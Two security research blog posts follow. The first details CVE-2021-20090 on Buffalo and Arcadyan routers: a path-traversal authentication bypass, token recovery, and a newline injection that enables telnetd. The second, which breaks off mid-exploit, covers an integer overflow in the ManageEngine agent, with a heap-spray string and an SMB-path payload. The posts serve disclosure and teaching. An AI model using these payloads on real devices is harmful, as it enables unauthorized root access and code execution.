UART interface on the WSR-2533DHP3

We can see a header labeled J4 which may be what we’re looking for. The next step is to test the contacts with a multimeter to identify power (VCC), ground (GND), and our potential transmit/receive (TX/RX) pins. Once we’ve identified those, we can solder on some pins and connect them to a tool like JTAGulator to identify which pins we will communicate on, and at what baud rate.

Don’t worry, this isn’t my usual setup, just a shameless plug

We could identify this in other ways, but the JTAGulator makes it much easier. After setting the voltage we’re using (3.3V found using the multimeter earlier) we can run a UART scan which will try sending a carriage-return (or some other specified bytes) and receiving on each pin, at different bauds, which helps us identify what combination thereof will let us communicate with the device.

Running a UART scan on JTAGulator

The UART scan shows that sending a carriage return over pin 0 as TX, with pin 2 as RX, and a baud of 57600, gives an output of BusyBox v1, which looks like we may have our shell.

UART scan finding the settings we need

Sure enough, after setting the JTAGulator to UART Passthrough mode (which allows us to communicate with the UART port) using the settings we found with the UART scan, we are dropped into a root shell on the device.

We can now use this shell to explore the device, and transfer any interesting binaries to another machine for analysis. In this case, we grabbed the httpd binary which was serving the device’s web interface.

Httpd and web interface authentication

Having access to the httpd binary makes hunting for vulnerabilities in the web interface much easier, as we can throw it into Ghidra and identify any interesting pieces of code. One of the first things I tend to look at when analyzing any web application or interface is how it handles authentication.

While examining the web interface I noticed that, even after logging in, no session cookies are set, and no tokens are stored in local/session storage, so how was it tracking who was authenticated? Opening httpd up in Ghidra, we find a function named evaluate_access() which leads us to the following snippet:

Snippet from FUN_0041fdd4(), called by evaluate_access()

FUN_0041f9d0() in the screenshot above checks to see if the IP of the host making the current request matches that of an IP from a previous valid login.

Now that we know what evaluate_access() does, let’s see if we can get around it. Searching for where it is referenced in Ghidra, we can see that it is only called from another function, process_request(), which handles any incoming HTTP requests.

process_request() deciding if it should allow the user access to a page

Something which immediately stands out is the logical OR in the larger if statement (lines 45–48 in the screenshot above) and the fact that it checks the value of uVar1 (set on line 43) before checking the output of evaluate_access(). This means that if the output of bypass_check(__dest) (where __dest is the url being requested) returns anything other than 0, we will effectively skip the need to be authenticated, and the request will go through to process_get() or process_post().

Let’s take a look at bypass_check().

Bypassing checks with bypass_check()

the bypass_list checked in bypass_check()

Taking a look at bypass_check() in the screenshot above, we can see that it is looping through bypass_list, and comparing the first n bytes of __dest to a string from bypass_list, where n is the length of the string grabbed from bypass_list. If no match is found, we return 0 and will be required to pass the checks in evaluate_access(). However, if the strings match, then we don’t care about the result of evaluate_access(), and the server will process our request as expected.

Glancing at the bypass list we see login.html, loginerror.html and some other paths/pages, which makes sense as even unauthenticated users will need to be able to access those urls.

You may have already noticed the bug here. bypass_check() is only checking as many bytes as are in the bypass_list strings. This means that if a user is trying to reach http://router/images/someimage.png, the comparison will match since /images/ is in the bypass list, and the url we are trying to reach begins with /images/. The bypass_check() function doesn’t care about strings which come after, such as “someimage.png”. So what if we try to reach /images/../<somepagehere>? For example, let’s try /images/..%2finfo.html. The /info.html url normally contains all of the nice LAN/WAN info when we first login to the device, but returns any unauthenticated users to the login screen. With our special url, we might be able to bypass the authentication requirement.
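The flaw is easy to reproduce outside the firmware. The sketch below mimics the prefix comparison in Python and contrasts it with one possible hardening (decoding and normalizing the path before matching). The list contents are a hypothetical subset limited to entries named above, and bypass_check_normalized is an illustration of a fix, not what the vendor shipped.

```python
import posixpath
from urllib.parse import unquote

# Hypothetical subset of the bypass list (entries named in this article).
BYPASS_LIST = ["/images/", "/login.html", "/loginerror.html"]


def bypass_check(url: str) -> int:
    """Mimic the flawed logic: compare only the first len(entry) bytes."""
    for entry in BYPASS_LIST:
        if url[:len(entry)] == entry:
            return 1
    return 0


def bypass_check_normalized(url: str) -> int:
    """One possible hardening: resolve %2f and ../ before matching."""
    decoded = unquote(url)
    path = posixpath.normpath(decoded)
    if decoded.endswith("/") and path != "/":
        path += "/"  # normpath drops the trailing slash; restore it
    return bypass_check(path)


print(bypass_check("/images/..%2finfo.html"))             # 1
print(bypass_check_normalized("/images/..%2finfo.html"))  # 0
```

The first call skips authentication even though the request ultimately resolves to /info.html; the normalized variant sees /info.html and falls through to the regular access check.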

After a bit of match/replace to account for relative paths, we still see an underwhelming display. We have successfully bypassed authentication using the path traversal (🙂 ) but we’re still missing something (🙁 ).

404s for requests made to js files

Looking at the Burp traffic, we can see that a number of requests to /cgi/<various_nifty_cgi>.js, which normally return all of the info we’re looking for, are returning a 404. We also see that there are a couple of parameters passed when making requests to those files.

One of those parameters (_t) is just a datetime stamp. The other is an httoken, which acts like a CSRF token, and figuring out where / how those are generated will be discussed in the next section. For now, let’s focus on why these particular requests are failing.

Looking at httpd in Ghidra shows that there is a fair amount of debugging output printed when errors occur. Stopping the default httpd process, and running it from our shell shows that we can easily see this output which may help us identify the issue with the current request.

requests failing due to improper Referer header

Without diving into url_token_pass, we can see that it is saying that httoken is invalid from http://192.168.11.1/images/..%2finfo.html. We will dive into httokens next, but the token we have here is correct, which means that the part causing the failure is the “from” url, which corresponds to the Referer header in the request. So, if we create a quick match/replace rule in Burp Suite to fix the Referer header to remove the /images/..%2f then we can see the info table, confirming our ability to bypass authentication.

our content loaded :)

A quick summary of where we are so far:

  • We can bypass authentication and access pages which should be restricted to authenticated users.
  • Those pages include access to httokens which let us make GET/POST requests for more sensitive info and grant the ability to make configuration changes.
  • We know we also need to set the Referer header appropriately in order for httokens to be accepted.

The adventure of getting proper httokens

While we know that the httokens are grabbed at some point on the pages we access, we don’t know where they’re coming from or how they’re generated. This will be important to understand if we want to carry this exploitation further, since they are required to do or access anything sensitive on the device. Tracking down how the web interface produces these tokens felt like something out of a Capture-the-Flag event.

The info.html page we accessed with the path traversal was populating its information table with data from .js files under the /cgi/ directory, and was passing two parameters. One, a date time stamp (_t), and the other, the httoken we’re trying to figure out.

We can see that the links used to grab the info from /cgi/ are generated using the URLToken() function, which sets the httoken (the parameter _tn in this case) using the function getToken(), but getToken() doesn’t seem to be defined anywhere in any of the scripts used on the page.

Looking right above where URLToken() is defined we see this strange string defined.

Looking into where it is used, we find the following snippet.

Which, when run, adds the following script to the page:

We’ve found our missing getToken() function, but it looks to be doing something equally strange as the snippets that got us here. It is grabbing another encoded string from an image tag which appears to exist on every page (with differing encoded strings). What is going on here?

getToken() is getting data from this spacer img tag

The httokens are being grabbed from these spacer img src strings and are used to make requests to sensitive resources.

We can find a function where the httoken is being inserted into the img tag in Ghidra.

Without going into all of the details around the setting/getting of httoken and how it is checked for GET and POST requests, we will say that:

  • httokens, which are required to make GET and POST requests to various parts of the web interface, are generated server-side.
  • They are stored encoded in the img tags at the bottom of any given page when it loads
  • They are then decoded in client-side javascript.

We can use the tokens for any requests we need as long as the token and the Referer being used in the request match. We can make requests to sensitive pages using the token grabbed from login.html, but we still need the authentication bypass to access some actions (like making configuration changes).

Notably, on the WSR-2533DHPL2 just using this knowledge of the tokens means we can access the administrator password for the device, a vulnerability which appears to already be fixed on the WSR-2533DHP3 (despite both having firmware releases around the same time).

Now that we know we can effectively perform any action on the device without being authenticated, let’s see what we can do with that.

Injecting configuration options and enabling telnetd

One of the first things I check in any web interface / application which has utilities like a ping function is how those utilities are implemented, because even a quick Google search turns up a number of historic examples of router ping utilities being prone to command injection vulnerabilities.

While there wasn’t an easily achievable command injection in the ping command, looking at how it is implemented led to another vulnerability. When the ping command is run from the web interface, it takes an input of the host to ping.

After the request is made successfully, ARC_ping_ipaddress is stored in the global configuration file. Noting this, the first thing I tried was to inject a newline/carriage return character (%0A when url-encoded), followed by some text to see if we could inject configuration settings. Sure enough, when checking the configuration file, the text entered after %0A appears on a new line in the configuration file.

With this in mind, we can take a look at any interesting configuration settings we see, and hope that we’re able to overwrite them by injecting the ARC_ping_ipaddress parameter. There are a number of options seen in the configuration file, but one which caught my attention was ARC_SYS_TelnetdEnable=0. Enabling telnetd seemed like a good candidate for gaining a remote shell on the device.
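To make the injection concrete, here is a minimal Python sketch of how a newline in the ping host value can turn into a second line of a key=value configuration file. The `naive_config_write` function is a hypothetical stand-in for whatever the firmware does internally, and the host address is a placeholder; only the two parameter names come from the device.

```python
from urllib.parse import quote, unquote


def build_ping_value(host: str, injected_setting: str) -> str:
    """URL-encode a ping host followed by a newline and an extra setting."""
    return quote(f"{host}\n{injected_setting}", safe="")


def naive_config_write(key: str, encoded_value: str) -> str:
    """Hypothetical stand-in for the firmware: decode the value and store
    it verbatim as key=value, without stripping newlines."""
    return f"{key}={unquote(encoded_value)}"


# Placeholder host; the newline is what smuggles in the second setting.
encoded = build_ping_value("192.168.11.1", "ARC_SYS_TelnetdEnable=1")
config_fragment = naive_config_write("ARC_ping_ipaddress", encoded)
print(encoded)
print(config_fragment)
```

The encoded value contains %0A, and the decoded fragment spans two lines, which is the behavior observed in the configuration file.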

It was unclear whether simply injecting ARC_SYS_TelnetdEnable=1 into the configuration file would work, as it would then be followed by a conflicting setting later in the file (ARC_SYS_TelnetdEnable=0 appears lower in the configuration file than ARC_ping_ipaddress). However, it did work after sending the following request in Burp Suite, followed by a reboot request (which is necessary for certain configuration changes to take effect).

Once the reboot completes we can connect to the device on port 23 where telnetd is listening, and are greeted with a root BusyBox shell, just like we have via UART.
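A quick way to confirm that the telnet service came up after the reboot is to attempt a TCP connection to port 23. This is a small sketch using only the Python standard library; the function name and default timeout are my own choices, and the address in the usage note is a placeholder.

```python
import socket


def port_is_open(host: str, port: int = 23, timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to host:port succeeds."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts and unreachable hosts.
        return False
```

For example, port_is_open("192.168.11.1") would be called once the device has finished rebooting.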

Altogether now

Here are the pieces we need to put together in a python script if we want to make exploiting this super easy:

  • Get proper httokens from the img tags on a page.
  • Use those httokens in combination with the path traversal to make a valid request to apply_abstract.cgi
  • In that valid request to apply_abstract.cgi, inject the ARC_SYS_TelnetdEnable=1 configuration option
  • Send another valid request to reboot the device
Running a quick PoC against the WSR-2533DHPL2

Surprise: More affected devices

Shortly before the 90 day disclosure date for the vulnerabilities discussed in this blog, I was trying to determine the number of potentially affected devices visible online via Shodan and BinaryEdge. In my searches, I noticed a number of devices which presented similar web interfaces to those seen on the Buffalo devices. Too similar, in fact, as they appeared to use almost all the same strange methods for hiding the httokens in img tags, and JavaScript functions obfuscated in “enkripsi” strings.

The common denominator is that all of the devices were manufactured by Arcadyan. In hindsight, it should have been obvious to look for more affected devices outside of Buffalo’s product line given how much of the Buffalo firmware appeared to have been built by Arcadyan. However, after obtaining and testing a number of Arcadyan-manufactured devices it also became clear that not all of them were created equally, and the devices weren’t always affected in exactly the same way.

That said, all of the devices we were able to test or have tested via third-parties shared at least one vulnerability: The path traversal which allows an attacker to bypass authentication, now assigned as CVE-2021–20090. This appears to be shared by almost every Arcadyan-manufactured router/modem we could find, including devices which were originally sold as far back as 2008.

On April 21st, 2021, Tenable reported CVE-2021–20090 to four additional vendors (Hughesnet, O2, Verizon, Vodafone), and reported the issues to Arcadyan on April 22nd. As time went on it became clear that many more vendors were affected and that contacting and tracking them all would become very difficult, so on May 18th, Tenable reported the issues to the CERT Coordination Center for help with that process. A list of the affected devices can be found in Tenable’s own advisory, and more information can be found on CERT’s page tracking the issue.

There is a much larger conversation to be had about how this vulnerability in Arcadyan’s firmware has existed for at least 10 years and has therefore found its way through the supply chain into at least 20 models across 17 different vendors, and that is touched on in a whitepaper Tenable has released.

Takeaways

The Buffalo WSR-2533DHPL2 was the first router I’d ever purchased for the purpose of discovering vulnerabilities, and it was a super fun experience. The strange obfuscations and simplicity of the bugs made it feel like my own personal CTF. While I got a little more than I bargained for upon learning how widespread one of the vulnerabilities (CVE-2021–20090) was, it was an important lesson in how one should approach research on consumer electronics: The vendor selling you the device is not necessarily the one who manufactured it, and if you find bugs in a consumer router’s firmware, they could potentially affect many more vendors and devices than just the one you are researching.

I’d also like to encourage security researchers who are able to get their hands on one of the 20+ affected devices to take a look for (and report) any post-authentication vulnerabilities like the configuration injection found in the Buffalo routers. I suspect there are a lot more issues to be found in this set of devices, but each device is slightly different and difficult to obtain for researchers not living in the country where they are sold/provided by a local ISP.

Thanks for reading, and happy hacking!


Bypassing Authentication on Arcadyan Routers with CVE-2021–20090 and rooting some Buffalo was originally published in Tenable TechBlog on Medium, where people are continuing the conversation by highlighting and responding to this story.

Integer Overflow to RCE — ManageEngine Asset Explorer Agent (CVE-2021–20082)

A couple months back, Chris Lyne and I had a look at ManageEngine ServiceDesk Plus. This product consists of a server / agent model in which agents provide updates on machine status back to the Manage Engine server. Chris ended up finding an unauth XSS-to-RCE chain in the server component which you can read here: https://medium.com/tenable-techblog/stored-xss-to-rce-chain-as-system-in-manageengine-servicedesk-plus-493c10f3e444, allowing an attacker to fully compromise the server with SYSTEM privileges.

This blog will go over the exploitation of an integer overflow (CVE-2021–20082) that I found in the agent itself, called Asset Explorer Agent. This exploit could allow an attacker to pivot through the network once the ManageEngine server is compromised. Alternatively, this could be exploited by spoofing the ManageEngine server IP on the network and triggering this vulnerability, as we will touch on later. While this PoC is not super reliable, it has been proven to work after several tries on a Windows 10 Pro 20H2 box (see below). I believe that further work on heap grooming could increase exploitation odds.

Linux machine (left), remotely exploiting integer overflow in ManageEngine Asset Explorer running on Windows 10 (right) and popping up a “whoami” dialog.

Attack Vector

The ManageEngine Windows agent executes as a SYSTEM service and listens on the network for commands from its ManageEngine server. While TLS is used for these requests, the agent never validates the certificate, so anyone on the network is able to perform this TLS handshake and send an unauthorized command to the agent. In order for the agent to run the command, however, the agent expects to receive an authtoken, which it echoes back to its configured server IP address for final approval. Only then will the agent carry out the command. This presents a small problem: the configured IP address is not ours, so the agent asks the real ManageEngine server to approve our authtoken, and that request is always going to be denied.

There is a way an attacker can exploit this design however and that’s by spoofing their IP on the network to be the Manage Engine server. I mentioned certs are not validated which allows an attacker to send and receive requests without an issue. This allows full control over the authtoken approval step, resulting in the agent running any arbitrary agent command from an attacker.
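The approval flow and the spoofing trick can be modeled in a few lines of Python. This is a toy sketch of the logic described above, not the agent’s actual code: the class, the function names, the IP address and the token are all hypothetical, and the `network` dictionary simply stands in for “whoever answers at a given IP”.

```python
from typing import Callable, Dict

# Maps an IP address to whoever answers approval requests at that address.
Network = Dict[str, Callable[[str], bool]]


class Agent:
    """Toy model of the agent's command approval flow."""

    def __init__(self, configured_server_ip: str, network: Network) -> None:
        self.configured_server_ip = configured_server_ip
        self.network = network

    def handle_command(self, command: str, authtoken: str) -> str:
        # The agent does not check who sent the command or validate any
        # certificate; it only asks its configured server about the token.
        approve = self.network[self.configured_server_ip]
        if approve(authtoken):
            return f"executed {command}"
        return "rejected"


def real_server(authtoken: str) -> bool:
    return False  # the real server never issued the attacker's token


def spoofed_server(authtoken: str) -> bool:
    return True  # the attacker approves their own token


network: Network = {"10.0.0.5": real_server}
agent = Agent("10.0.0.5", network)
before = agent.handle_command("NEWSCAN", "attacker-token")

# The attacker now answers at the server's IP address.
network["10.0.0.5"] = spoofed_server
after = agent.handle_command("NEWSCAN", "attacker-token")
print(before, "->", after)
```

The only thing that changes between the two calls is who responds at the configured address, which is the whole point of the spoofing approach.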

From here, you may think there is a command that can remotely run tasks or execute code on agents. Unfortunately, this was not the case, as the agent is very lightweight and supports a limited number of features, none of which allowed for logical exploitation. This forced me to look into memory corruption in order to gain remote code execution through this vector. From reverse engineering the agents, I found a couple of small memory handling issues, such as leaks and a heap overflow with unicode data, but nothing that led me to RCE.

Integer Overflow

When the agent receives final confirmation from its server, it is in the form of a POST request from the Manage Engine server. Since we are assuming the attacker has been able to insert themselves as a fake Manage Engine server or has compromised a real Manage Engine server, this allows them to craft and send any POST response to this agent.

When the agent processes this POST request, WinAPI functions for HTTP handling are used. One of these is HttpQueryInfoW, which is used to query the incoming POST request for its “Content-Size” field. This Content-Size field is then used as a size parameter in order to allocate memory on the heap to copy over the POST payload data.

There is some integer arithmetic performed between receiving the Content-Size field and actually using this size to allocate heap memory. This is where we can exploit an integer overflow.

Here you can see the Content-Size is incremented by one, multiplied by four, and finally incremented by an extra two bytes. This is a 32-bit agent, using 32-bit integers, which means if we supply a Content-Size of UINT32_MAX/4, the integer should overflow and wrap back around to a size of 2 when passed to calloc. Once this allocation of only two bytes is made on the heap, the following API call, InternetReadFile, will copy our POST payload data to the destination buffer until all of the POST data is read. If our POST data is larger than two bytes, then that data will be copied beyond the two-byte buffer, resulting in a heap overflow.
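The wraparound is easy to verify with a few lines of Python that emulate unsigned 32-bit arithmetic. This is a sketch of the arithmetic only, based on the description above (add one, multiply by four, add two); the function name is my own.

```python
UINT32_MAX = 0xFFFFFFFF


def alloc_size(content_size: int) -> int:
    """Size passed to calloc: (content_size + 1) * 4 + 2, truncated to 32 bits."""
    return ((content_size + 1) * 4 + 2) & UINT32_MAX


benign = alloc_size(100)               # an ordinary request
wrapped = alloc_size(UINT32_MAX // 4)  # 0x3FFFFFFF wraps the multiplication
print(benign, wrapped)
```

With a Content-Size of 0x3FFFFFFF, the addition gives 0x40000000, the multiplication by four gives 0x100000000 (which truncates to 0 in 32 bits), and the final addition leaves an allocation size of 2.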

Things are looking really good here because we not only can control the size of the heap overflow (tailoring our post data size to overwrite whatever amount of heap memory), but we also can write non-printable characters with this overflow, which is always good for exploiting write conditions.

No ASLR

Did I mention these agents don’t support ASLR? Yeah, they are compiled with no relocation table, which means even if Windows 10 tries to force ASLR, it can’t and defaults the executable base to the PE ImageBase. At this point, exploitation was sounding too easy, but quickly I found…it wasn’t.
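If you want to check this kind of thing on a binary yourself, the two relevant PE header flags can be read directly. The sketch below is not how I checked the agent; it is a generic standard-library example that reads IMAGE_FILE_RELOCS_STRIPPED from the COFF Characteristics field and IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE from the optional header. The function name is my own.

```python
import struct

IMAGE_FILE_RELOCS_STRIPPED = 0x0001
IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE = 0x0040


def aslr_indicators(pe_bytes: bytes) -> dict:
    """Read the two PE header flags most relevant to ASLR."""
    # e_lfanew at offset 0x3C of the DOS header points to the PE signature.
    (e_lfanew,) = struct.unpack_from("<I", pe_bytes, 0x3C)
    if pe_bytes[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("not a PE file")
    # The 20-byte COFF header follows the 4-byte signature;
    # Characteristics is its last 2-byte field.
    (characteristics,) = struct.unpack_from("<H", pe_bytes, e_lfanew + 22)
    # The optional header starts right after the COFF header;
    # DllCharacteristics sits at offset 70 within it.
    (dll_characteristics,) = struct.unpack_from("<H", pe_bytes, e_lfanew + 24 + 70)
    return {
        "relocs_stripped": bool(characteristics & IMAGE_FILE_RELOCS_STRIPPED),
        "dynamic_base": bool(
            dll_characteristics & IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE
        ),
    }
```

Passing the contents of an executable (for example, the bytes returned by open(path, "rb").read()) returns both flags; a binary with stripped relocations cannot be rebased even if ASLR is forced.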

Creating a Write Primitive

I can overwrite a controlled amount of arbitrary data on the heap now, but how do I write something and somewhere…interesting? This needs to be done without crashing the agent. From here, I looked for pointers or interesting data on the heap that I could overwrite. Unfortunately, this agent’s functionality is quite small and there were no object or function pointers or interesting strings on the heap for me to overwrite.

In order to do anything interesting, I was going to need a write condition outside the boundaries of this heap segment. For this, I was able to craft a Write-AlmostWhat-Where by abusing heap cell pointers used by the heap manager. Asset Explorer contains Microsoft’s CRT heap library for managing the heap. The implementation uses a doubly linked list to keep track of allocated cells, and generally looks something like this:

Just like when any linked list is altered (in this case via a heap free or heap malloc), the next and prev pointers must be readjusted after insertion or deletion of a node (seen below).

For our attack we will be focusing on exploiting the free logic which is found in the Microsoft Free_dbg API. When a heap cell is freed, it removes the target node and remerges the neighboring nodes. Below is the Free_dbg function from Microsoft library, which uses _CrtMemBlockHeader for its heap cells. The red blocks are the remerging logic for these _CrtMemBlockHeader nodes in the linked list.

This means if we overwrite a _CrtMemBlockHeader* prev pointer with an arbitrary address (ideally an address outside of this cursed memory segment we are stuck in), then upon that heap cell being freed, the contents of this arbitrary *prev address will have the _CrtMemBlockHeader* next pointer written to where *prev points to. It gets better…we can also overflow into the _CrtMemBlockHeader* next pointer as well, allowing us to control what * next is, thus creating an arbitrary write condition for us — one DWORD at a time.

There is a small catch, however. The _CrtMemBlockHeader* next and _CrtMemBlockHeader* prev are both dereferenced and written to in this remerging logic, which means I can’t just overwrite the *prev pointer with any arbitrary data I want: it must itself be a valid pointer to a writable memory location, since its contents will also be written to during the Free_dbg function. This means I can only write pointers to places in memory, and these pointers must point to writable memory themselves. This prevents me from writing executable memory pointers (as they point to RX protected memory) as well as pointers to non-existent memory (as the dereference step in Free_dbg will cause an access violation). This proved to be very constraining for my exploitation.
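The primitive and its constraint can be illustrated with a small Python simulation of a doubly linked list unlink. This is a sketch under stated assumptions rather than the CRT’s code: the field offsets (next at +0, prev at +4), the `Memory` model, and every address below are hypothetical and chosen only for illustration.

```python
NEXT_OFFSET = 0  # assumed offset of the next pointer within a header
PREV_OFFSET = 4  # assumed offset of the prev pointer within a header


class AccessViolation(Exception):
    """Raised when the simulated unlink touches non-writable memory."""


class Memory:
    """Tiny model of 32-bit memory: a set of writable DWORD slots."""

    def __init__(self, writable_addresses):
        self.cells = {addr: 0 for addr in writable_addresses}

    def write_dword(self, addr: int, value: int) -> None:
        if addr not in self.cells:
            raise AccessViolation(hex(addr))
        self.cells[addr] = value & 0xFFFFFFFF


def unlink(mem: Memory, next_ptr: int, prev_ptr: int) -> None:
    """Remerge the neighbours of a freed node, as a list removal does."""
    if next_ptr:
        mem.write_dword(next_ptr + PREV_OFFSET, prev_ptr)  # next->prev = prev
    if prev_ptr:
        mem.write_dword(prev_ptr + NEXT_OFFSET, next_ptr)  # prev->next = next


TARGET_GLOBAL = 0x00450000  # hypothetical .data variable we want to change
HEAP_STRING = 0x00A000F8    # hypothetical writable heap data we control
CODE_ADDRESS = 0x00401000   # hypothetical address in read/execute memory

mem = Memory([TARGET_GLOBAL, HEAP_STRING])

# Corrupted header: both values are valid, writable locations.
unlink(mem, next_ptr=TARGET_GLOBAL - PREV_OFFSET, prev_ptr=HEAP_STRING)

# Trying to plant a code pointer fails, because the unlink also writes
# through that pointer.
try:
    unlink(mem, next_ptr=TARGET_GLOBAL - PREV_OFFSET, prev_ptr=CODE_ADDRESS)
    crashed = False
except AccessViolation:
    crashed = True
print(hex(mem.cells[TARGET_GLOBAL]), crashed)
```

Note the side effect in the successful case: the first DWORD at the heap address is also clobbered, which is why only pointers to writable memory are usable values.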

Data-Only Attack

Data-only attacks are getting more popular for exploiting memory corruption bugs, and I’m definitely going to opt for that here. This binary has no ASLR to worry about, so browsing the .data section of the executable and finding an interesting global variable to overwrite is the best step. When searching for these, many of the global variables point to strings, which seem cool — but remember, it will be very hard to abuse my write primitive to overwrite string data, since the string data I would want to write must represent a pointer to valid and writable memory in the program. This limits me to searching for an interesting global variable pointer to overwrite.

Step 1 : Overwrite the Current Working Directory

I found a great candidate to leverage this pointer write primitive. It is a global variable pointer in Asset Explorer’s .data section that points to a unicode string that dictates the current working directory of the Manage Engine agent.

We need to know how this is used in order to abuse it correctly, and a few XREFs later, I found this string pointer is dereferenced and passed to SetCurrentDirectory whenever a “NEWSCAN” request is sent to the agent (which we can easily do as a remote attacker). This call dynamically changes the current working directory for the remote Asset Explorer service which is what I shoot for in developing an exploit. Even better, the NEWSCAN request then calls “CreateProcess” to execute a .bat file from the current working directory. If we can modify this current working directory to point to a remote SMB share we own, and place a malicious .bat file on our SMB share with the same name, then Asset Explorer will try to execute this .bat file off our SMB share instead of the local one, resulting in RCE. All we need to do is modify this pointer so that it points to a malicious remote SMB path we own, trigger a NEWSCAN request so that the current working directory is changed, and make it execute our .bat file.

Since ASLR is not enabled, I know what this pointer address will be, so we just need to trigger our heap overflow to exploit my pointer write condition with Free_dbg to replace this pointer.

To effectively change this current working directory, you would need to:

1. Trigger the heap overflow to overwrite the *next and *prev pointers of a heap cell that will be freed (medium)

2. Overwrite the *next pointer with the address of this current working directory global variable as it will be the destination for our write primitive (easy)

3. Overwrite the *prev pointer with a pointer that points to a unicode string of our SMB share path (hard).

4. Trigger new scan request to change current working directory and execute .bat file (easy)

For step 1, this ideally would require some grooming, so we can trigger our overflow once our cell is flush against another heap cell and carefully overwrite its _CrtMemBlockHeader. Unfortunately, my heap grooming attempts were not working to force allocations where I wanted. This is partially due to the limited size I was able to allocate in the remote process, and in large part due to my limited Windows 10 heap grooming experience. Luckily, there was pretty much no penalty for failed overflow attempts, since I am only overwriting the linked list pointers of heap cells and the heap manager was apparently very ok with that. With that in mind, I run my heap overflow several times and hope it writes over a particular existing heap cell with my write primitive payload. I found that ~20 attempts of this overflow will usually end up overflowing the heap cell I want.

What is the heap cell I want? Well, I need it to be a heap cell which will be freed because that’s the only way to trigger my arbitrary write. Also, I need to know where I sprayed my malicious SMB path string in heap memory, since I need to overwrite the current working directory global variable with a pointer to my string. Without knowing my own string address, I have no idea what to write. Luckily I found a way to get around this without needing an infoleak.

Bypassing the Need for Infoleak

In my PoC I am initially sending the following string to the agent:

XXXXXXXX1#X#X#XXXXXXXX3#XXXXXXXX2#//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/

Asset Explorer will parse this string once received and allocate a unicode string for each substring delimited by “#” symbols. Since heap cells are tracked in a doubly linked list, these allocations are linked sequentially in the order they are made. So, what I need to do is overflow into the heap cell header for the “XXXXXXXX2” string, with the understanding that its _CrtMemBlockHeader* prev pointer will point to the next heap cell to be allocated, which is always the //.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//.//UNC//127.0.0.1/a/ string.

If we overwrite the _CrtMemBlockHeader* next pointer with the .data address of the current working directory global variable, and only overwrite the first (lowest order) byte of the _CrtMemBlockHeader* prev pointer, then we won’t need an info leak. Since the upper three bytes already dictate the SMB string’s general memory address, we just need to offset the last byte so that it points to the actual string data rather than the _CrtMemBlockHeader structure it currently points to. This is why I chose to overwrite the lowest order byte with “0xf8”, to guarantee the maximum offset from the _CrtMemBlockHeader.
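The partial overwrite is simple pointer arithmetic: keep the upper three bytes the heap manager already wrote and replace only the lowest byte. Here is a minimal Python sketch; the heap addresses are hypothetical examples and the function name is my own.

```python
def overwrite_low_byte(pointer: int, new_byte: int) -> int:
    """Replace only the lowest-order byte of a 32-bit pointer."""
    return (pointer & 0xFFFFFF00) | (new_byte & 0xFF)


# Hypothetical heap addresses of the header the pointer originally targets.
for original in (0x00A41200, 0x00A41240, 0x00A412C0):
    patched = overwrite_low_byte(original, 0xF8)
    # The patched pointer stays in the same 256-byte window as the original,
    # so no leak of the upper bytes is needed.
    print(hex(original), "->", hex(patched), "offset", patched - original)
```

Because the resulting offset from the header depends on where the header happens to sit within its 256-byte window, the landing spot inside the string varies from run to run.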

It’s beneficial if we can craft an SMB path string with nonsense characters prepended to it (similar to a nop-sled, but for a file path). This gives us a greater probability that our 0xf8 offset points somewhere in our SMB path string that SetCurrentDirectory can still interpret as a valid path with prepended nonsense characters (i.e. .\.\.\.\.\<path>). Unfortunately, .\.\.\.\ wouldn’t work for an SMB share, but thanks to Chris Lyne, who was able to craft a nicely padded SMB path, I could use something like this:

//.//.//.//.//.//UNC//<ip_address>/a/

This will allow the path to be simply treated as “//<ip_address>/a/”. If we provide enough “//.” in front of our path, we will have about a ⅓ chance of hitting our sled properly when overwriting the lowest *prev byte with 0xf8. These are much better odds than if I used a simple, straightforward SMB string.
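Here is a short Python sketch of the padded path and of where the ⅓ figure comes from. It only models character offsets within the sled: each “//.” unit is three characters long, so one in three offsets lands on a unit boundary. The function names, the default sled length and the share name parameter are my own, and the sketch does not model UTF-16 byte alignment or test which alignments Windows actually accepts.

```python
def padded_unc_path(ip_address: str, share: str = "a", sled_units: int = 40) -> str:
    """Build //.//. ... //UNC//<ip>/<share>/ with a sled of '//.' units."""
    return "//." * sled_units + f"//UNC//{ip_address}/{share}/"


def aligned_fraction(path: str, sled_units: int) -> float:
    """Fraction of character offsets inside the sled at which the remaining
    suffix still starts on a '//.' unit boundary."""
    sled_len = 3 * sled_units
    hits = sum(1 for i in range(sled_len) if path[i:].startswith("//."))
    return hits / sled_len


short_path = padded_unc_path("127.0.0.1", sled_units=5)
print(short_path)
print(aligned_fraction(short_path, 5))
```

A longer sled does not change the ratio, but it does make it more likely that the 0xf8 offset lands somewhere inside the sled rather than before or after it.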

I ran my exploit, witnessed it overwrite the current working directory, and then saw Asset Explorer attempt to execute our .bat file off our remote SMB share…but it wasn’t working. It was that day when I learned .bat files cannot be executed off remote SMB shares with CreateProcess.

Step 2: Hijacking Code Flow

I didn’t come this far to just give up, so we need to look at a different technique to turn our current working directory modification into remote code execution. Libraries (.dll files) do not have this restriction, so I search for places where Asset Explorer might try to load a library. This is a tough ask, because it has to be a dynamic loading of a library (not super common for applications to do) that I can trigger, and also — it cannot be a known dll (ie: kernel32.dll, rpcrt4.dll, etc), since search order for these .dlls will not bother with the application’s current working directory, but rather prioritize loading from a Windows directory. For this I need to find a way to trigger the agent to load an unknown dll.

After searching, I found a function called GetPdbDll in the agent which attempts to dynamically load “Mspdb80.dll”, a debugging dll used for RTC (runtime checks). This is an unknown dll, so the agent should attempt to load it from its current working directory. Ok, so how do I call this thing?

Well, you can’t… I couldn’t find any XREFs to code flow that could end up calling this function. I assumed it was left in as a stub by the compiler, as I couldn’t even find indirect calls that might lead code flow here. I will have to abandon my data-only attack plan here and attempt to hijack code flow for this last part.

